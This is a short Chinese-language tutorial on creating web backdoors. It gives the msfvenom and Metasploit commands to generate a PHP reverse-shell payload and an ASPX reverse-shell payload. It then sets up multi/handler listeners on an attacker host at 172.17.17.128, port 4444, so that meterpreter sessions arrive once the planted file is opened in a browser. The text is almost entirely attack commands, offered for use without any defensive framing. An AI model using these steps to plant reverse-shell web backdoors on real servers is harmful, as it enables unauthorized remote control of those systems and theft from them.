web后门是大家常用的后门之一,现介绍两种web后门,方便各位用来获得meterpreter,一种是php反弹shell木马,另一种是aspx反弹shell木马。
一、php反弹shell
利用msfvenom工具生成php反弹shell:
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
-p 表示使用类型为payloads
-f 表示输出的文件格式
接着,在msf中设置监听:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 172.17.17.128
run
一旦攻击对象通过浏览器点开shell.php文件,msf会获得返回的meterpreter,此时攻击成功。
2、aspx反弹shell
aspx meterpreter后门与上述后门类似,首先使用下列命令调用漏洞模块,并设置相关参数
use windows/shell_reverse_tcp
set lhost 172.17.17.128
set lport 4444
generate -h 查看该模块使用方法
generate -f aspx
此时会生成一段aspx代码,把代码复制到一个文档中,命名shell.aspx。
在msf中设置监听:
set exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.17.17.128
set lport 4444
run
最后,将shell.aspx传入web服务器目录下,在浏览器中打开该文件,稍等片刻便能取得meterpreter。